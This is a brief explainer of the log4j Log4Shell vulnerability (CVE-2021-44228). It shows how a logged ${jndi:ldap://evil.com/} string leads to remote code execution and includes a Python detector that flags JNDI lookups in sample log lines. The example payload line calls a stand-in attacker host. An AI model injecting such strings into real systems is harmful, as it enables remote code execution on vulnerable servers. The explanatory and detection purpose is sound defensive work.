
TL;DR: log4j vulnerability

LDAP & JNDI

Java can connect to an LDAP server and retrieve the attributes of a directory object. For example, the URL ldap://server:389/o=Test asks the LDAP server at server:389 for the object named Test. JNDI (Java Naming and Directory Interface) is the Java API that performs such lookups; it allows Java objects to be fetched from a naming or directory service and loaded into a running program.

Exploitation

log4j implements lookups: a log message containing ${env:PWD} was expanded, so the value of the PWD environment variable ended up in the log. Moreover, the JNDI lookup was enabled by default: a message containing ${jndi:ldap://evil.com/} made the server fetch that URL and then load and execute, via JNDI, the Java object that came back. An attacker who can get such a string logged therefore only needs to host a malicious Java object behind an LDAP server to obtain remote code execution (RCE).
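The lookup syntax described above is also what a defender searches for in logs and in user-supplied fields. The following is an added example (not code from the article or from log4j) that parses ${...} lookups out of constructed sample log lines and flags the ones using the jndi prefix; the host name evil.example is a placeholder.

```python
# Constructed sample log lines (not from any real incident): a plain request,
# a benign env lookup, and a JNDI lookup of the kind the article describes.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    'config: working directory is ${env:PWD}',
    '10.0.0.9 - - "GET / HTTP/1.1" 404 "${jndi:ldap://evil.example/o=Test}"',
]


def extract_lookups(line: str) -> list:
    """Return the body of every outermost ${...} lookup in `line`.

    Brace depth is tracked so a nested lookup such as ${a:${b:c}} comes back
    as one body, "a:${b:c}", instead of being cut at the first '}'.
    An unterminated "${" is ignored.
    """
    lookups = []
    i = 0
    while i < len(line):
        if line.startswith("${", i):
            depth, j = 1, i + 2
            while j < len(line) and depth:
                if line.startswith("${", j):
                    depth += 1
                    j += 2
                    continue
                if line[j] == "}":
                    depth -= 1
                j += 1
            if depth == 0:
                lookups.append(line[i + 2:j - 1])
                i = j
                continue
        i += 1
    return lookups


def lookup_prefix(body: str) -> str:
    """The text before the first ':' names the lookup plugin (env, jndi, ...)."""
    return body.split(":", 1)[0].strip().lower()


def scan(lines) -> list:
    """Return (line_no, lookup_body, is_jndi) for every lookup in the log.

    Any lookup inside user-controlled input is worth a look; jndi ones are
    the Log4Shell pattern and should page someone.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        for body in extract_lookups(line):
            hits.append((n, body, lookup_prefix(body) == "jndi"))
    return hits


if __name__ == "__main__":
    for line_no, body, is_jndi in scan(SAMPLE_LOG_LINES):
        print(f"line {line_no}: ${{{body}}} {'JNDI!' if is_jndi else ''}")
```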

Who is vulnerable?

Applications that use log4j to log user-controlled input are vulnerable, and log4j is heavily used across the internet. Note that there is currently only one critical vulnerability (CVE-2021-44228) that you should fix immediately. The others (CVE-2021-4104, CVE-2021-45046) are less interesting, as they require an attacker to be able to edit configuration files or rely on specific configurations. log4j disabled JNDI by default from 2.16.0.